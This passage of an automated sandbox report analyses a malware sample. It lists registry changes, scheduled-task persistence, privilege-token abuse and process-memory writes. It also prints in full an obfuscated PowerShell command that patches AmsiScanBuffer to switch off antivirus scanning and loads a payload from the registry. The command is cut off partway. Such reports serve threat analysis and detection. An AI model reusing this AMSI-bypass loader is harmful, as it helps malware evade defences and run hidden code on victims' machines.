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"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxhocfehztebrs\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qynkjbtxndhbqb	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxhocfehztebrs\DeviceId = "<Data DAInvalidationTime=\"1734177500\"><User username=\"02XXHOCFEHZTEBRS\"><HardwareInfo BoundTime=\"1734177500\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02xxhocfehztebrs\DeviceId = "<Data DAInvalidationTime=\"1734177500\"><User username=\"02XXHOCFEHZTEBRS\"><HardwareInfo BoundTime=\"1734177501\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qynkjbtxndhbqb\DeviceId = "<Data LastUpdatedTime=\"1734177498\"><User username=\"02QYNKJBTXNDHBQB\"><HardwareInfo BoundTime=\"1734177497\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02ygmmrhejyrygsu\Reason = "2147780641"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qynkjbtxndhbqb	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184011D3029FD1 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b0000000002000000000010660000000100002000000026d6988b314a57e9e6e89981fe3a0fb9b0c40f4281b903ef9c047c4a40763fdb000000000e80000000020000200000008c409e88e98b59a72014b962130bcf01c0986282e90a1d7cf91d22eb160a6e6180000000fe225aa598cf9a23acad455c6327754fe887ae1c1ca3d54b950275f0b295c283ebf4ca48888596735c39a610c3e349e16131c46a46f58b14d6fecb433a73abb35af336fba0a6a2f7d3cfc0febb688c0630d375d0bbb0e0b00c77ed35588fbf6dd0313b134dd534b920d1aac142b64b2b395e2f152b9b3935f15b45e74858359c400000003fed908d853b626e5d24f6ae35d18e8e53085276b0098320958eb9d9337a28d39eeb269540308e72da5c1d6e18f5e393f89ddfd3a7a817b95ef6c990cd04ffb6	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qynkjbtxndhbqb\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe

Modifies registry class 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
976	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2304	powershell.EXE
2304	powershell.EXE
2304	powershell.EXE
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
5048	wmiprvse.exe
5048	wmiprvse.exe
5048	wmiprvse.exe
5048	wmiprvse.exe
4444	dllhost.exe
4444	dllhost.exe
5048	wmiprvse.exe
5048	wmiprvse.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
3244	powershell.exe
3244	powershell.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
4444	dllhost.exe
3320	powershell.exe
4444	dllhost.exe
4444	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3488	KrnlSetupSus.exe
Token: SeDebugPrivilege	2304	powershell.EXE
Token: SeDebugPrivilege	2304	powershell.EXE
Token: SeDebugPrivilege	4444	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2196	svchost.exe
Token: SeIncreaseQuotaPrivilege	2196	svchost.exe
Token: SeSecurityPrivilege	2196	svchost.exe
Token: SeTakeOwnershipPrivilege	2196	svchost.exe
Token: SeLoadDriverPrivilege	2196	svchost.exe
Token: SeSystemtimePrivilege	2196	svchost.exe
Token: SeBackupPrivilege	2196	svchost.exe
Token: SeRestorePrivilege	2196	svchost.exe
Token: SeShutdownPrivilege	2196	svchost.exe
Token: SeSystemEnvironmentPrivilege	2196	svchost.exe
Token: SeUndockPrivilege	2196	svchost.exe
Token: SeManageVolumePrivilege	2196	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2196	svchost.exe
Token: SeIncreaseQuotaPrivilege	2196	svchost.exe
Token: SeSecurityPrivilege	2196	svchost.exe
Token: SeTakeOwnershipPrivilege	2196	svchost.exe
Token: SeLoadDriverPrivilege	2196	svchost.exe
Token: SeSystemtimePrivilege	2196	svchost.exe
Token: SeBackupPrivilege	2196	svchost.exe
Token: SeRestorePrivilege	2196	svchost.exe
Token: SeShutdownPrivilege	2196	svchost.exe
Token: SeSystemEnvironmentPrivilege	2196	svchost.exe
Token: SeUndockPrivilege	2196	svchost.exe
Token: SeManageVolumePrivilege	2196	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2196	svchost.exe
Token: SeIncreaseQuotaPrivilege	2196	svchost.exe
Token: SeSecurityPrivilege	2196	svchost.exe
Token: SeTakeOwnershipPrivilege	2196	svchost.exe
Token: SeLoadDriverPrivilege	2196	svchost.exe
Token: SeSystemtimePrivilege	2196	svchost.exe
Token: SeBackupPrivilege	2196	svchost.exe
Token: SeRestorePrivilege	2196	svchost.exe
Token: SeShutdownPrivilege	2196	svchost.exe
Token: SeSystemEnvironmentPrivilege	2196	svchost.exe
Token: SeUndockPrivilege	2196	svchost.exe
Token: SeManageVolumePrivilege	2196	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2196	svchost.exe
Token: SeIncreaseQuotaPrivilege	2196	svchost.exe
Token: SeSecurityPrivilege	2196	svchost.exe
Token: SeTakeOwnershipPrivilege	2196	svchost.exe
Token: SeLoadDriverPrivilege	2196	svchost.exe
Token: SeSystemtimePrivilege	2196	svchost.exe
Token: SeBackupPrivilege	2196	svchost.exe
Token: SeRestorePrivilege	2196	svchost.exe
Token: SeShutdownPrivilege	2196	svchost.exe
Token: SeSystemEnvironmentPrivilege	2196	svchost.exe
Token: SeUndockPrivilege	2196	svchost.exe
Token: SeManageVolumePrivilege	2196	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2196	svchost.exe
Token: SeIncreaseQuotaPrivilege	2196	svchost.exe
Token: SeSecurityPrivilege	2196	svchost.exe
Token: SeTakeOwnershipPrivilege	2196	svchost.exe
Token: SeLoadDriverPrivilege	2196	svchost.exe
Token: SeSystemtimePrivilege	2196	svchost.exe
Token: SeBackupPrivilege	2196	svchost.exe
Token: SeRestorePrivilege	2196	svchost.exe
Token: SeShutdownPrivilege	2196	svchost.exe
Token: SeSystemEnvironmentPrivilege	2196	svchost.exe
Token: SeUndockPrivilege	2196	svchost.exe
Token: SeManageVolumePrivilege	2196	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3488	KrnlSetupSus.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3492	Explorer.EXE
4156	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 972	4504	Install.exe	82
PID 4504 wrote to memory of 972	4504	Install.exe	82
PID 4504 wrote to memory of 972	4504	Install.exe	82
PID 4504 wrote to memory of 3488	4504	Install.exe	83
PID 4504 wrote to memory of 3488	4504	Install.exe	83
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 2304 wrote to memory of 4444	2304	powershell.EXE	87
PID 4444 wrote to memory of 620	4444	dllhost.exe	5
PID 4444 wrote to memory of 688	4444	dllhost.exe	7
PID 4444 wrote to memory of 964	4444	dllhost.exe	12
PID 4444 wrote to memory of 316	4444	dllhost.exe	13
PID 4444 wrote to memory of 748	4444	dllhost.exe	14
PID 4444 wrote to memory of 1040	4444	dllhost.exe	16
PID 4444 wrote to memory of 1112	4444	dllhost.exe	17
PID 4444 wrote to memory of 1140	4444	dllhost.exe	18
PID 4444 wrote to memory of 1156	4444	dllhost.exe	19
PID 4444 wrote to memory of 1212	4444	dllhost.exe	20
PID 4444 wrote to memory of 1236	4444	dllhost.exe	21
PID 4444 wrote to memory of 1300	4444	dllhost.exe	22
PID 4444 wrote to memory of 1392	4444	dllhost.exe	23
PID 4444 wrote to memory of 1408	4444	dllhost.exe	24
PID 4444 wrote to memory of 1516	4444	dllhost.exe	25
PID 4444 wrote to memory of 1524	4444	dllhost.exe	26
PID 4444 wrote to memory of 1540	4444	dllhost.exe	27
PID 4444 wrote to memory of 1660	4444	dllhost.exe	28
PID 4444 wrote to memory of 1704	4444	dllhost.exe	29
PID 4444 wrote to memory of 1716	4444	dllhost.exe	30
PID 4444 wrote to memory of 1808	4444	dllhost.exe	31
PID 4444 wrote to memory of 1816	4444	dllhost.exe	32
PID 4444 wrote to memory of 1924	4444	dllhost.exe	33
PID 4444 wrote to memory of 1940	4444	dllhost.exe	34
PID 4444 wrote to memory of 1996	4444	dllhost.exe	35
PID 4444 wrote to memory of 2008	4444	dllhost.exe	36
PID 4444 wrote to memory of 1888	4444	dllhost.exe	37
PID 4444 wrote to memory of 2152	4444	dllhost.exe	39
PID 4444 wrote to memory of 2196	4444	dllhost.exe	40
PID 4444 wrote to memory of 2256	4444	dllhost.exe	41
PID 4444 wrote to memory of 2420	4444	dllhost.exe	42
PID 4444 wrote to memory of 2428	4444	dllhost.exe	43
PID 4444 wrote to memory of 2568	4444	dllhost.exe	44
PID 4444 wrote to memory of 2612	4444	dllhost.exe	45
PID 4444 wrote to memory of 2644	4444	dllhost.exe	46
PID 4444 wrote to memory of 2656	4444	dllhost.exe	47
PID 4444 wrote to memory of 2668	4444	dllhost.exe	48
PID 4444 wrote to memory of 2964	4444	dllhost.exe	49
PID 4444 wrote to memory of 2988	4444	dllhost.exe	50
PID 4444 wrote to memory of 3036	4444	dllhost.exe	51
PID 4444 wrote to memory of 1068	4444	dllhost.exe	52
PID 4444 wrote to memory of 3088	4444	dllhost.exe	53
PID 4444 wrote to memory of 3412	4444	dllhost.exe	55
PID 4444 wrote to memory of 3492	4444	dllhost.exe	56
PID 4444 wrote to memory of 3616	4444	dllhost.exe	57
PID 4444 wrote to memory of 3816	4444	dllhost.exe	58
PID 4444 wrote to memory of 3976	4444	dllhost.exe	60
PID 4444 wrote to memory of 4156	4444	dllhost.exe	62
PID 4444 wrote to memory of 4680	4444	dllhost.exe	65
PID 4444 wrote to memory of 420	4444	dllhost.exe	66
PID 4444 wrote to memory of 1444	4444	dllhost.exe	68

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:316
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ee348cb5-2aac-4565-829d-63c20d7be301}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4444

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1112
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:1068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AZkhxvoKTiTM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wiJlxgesUgLdDw,[Parameter(Position=1)][Type]$chCsNdpolU)$ASCFUUEOAnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+'ryMo'+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'Dele'+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',A'+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ASCFUUEOAnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+'ci'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+'e,'+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wiJlxgesUgLdDw).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$ASCFUUEOAnm.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+'bl'+'i'+'c,'+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+[Char](108)+'',$chCsNdpolU,$wiJlxgesUgLdDw).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $ASCFUUEOAnm.CreateType();}$wuzEQSRsRamkB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'ds');$zmPXRqLIswjBKi=$wuzEQSRsRamkB.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TFmtUEEoiJMPlhggzBD=AZkhxvoKTiTM @([String])([IntPtr]);$CHXkuFacNVAmQHayZWffxp=AZkhxvoKTiTM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CTPhHjmmydI=$wuzEQSRsRamkB.GetMethod(''+'G'+''+'e'+''+'t'+'Mo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$eGqKxSuRsjOJhk=$zmPXRqLIswjBKi.Invoke($Null,@([Object]$CTPhHjmmydI,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$FbhqeHNehPIdFSNiO=$zmPXRqLIswjBKi.Invoke($Null,@([Object]$CTPhHjmmydI,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+'lPr'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$dOyVrTA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eGqKxSuRsjOJhk,$TFmtUEEoiJMPlhggzBD).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$pUBsjugUTiMYQWCSh=$zmPXRqLIswjBKi.Invoke($Null,@([Object]$dOyVrTA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$IKIkVymkZO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FbhqeHNehPIdFSNiO,$CHXkuFacNVAmQHayZWffxp).Invoke($pUBsjugUTiMYQWCSh,[uint32]8,4,[ref]$IKIkVymkZO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pUBsjugUTiMYQWCSh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FbhqeHNehPIdFSNiO,$CHXkuFacNVAmQHayZWffxp).Invoke($pUBsjugUTiMYQWCSh,[uint32]8,0x20,[ref]$IKIkVymkZO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)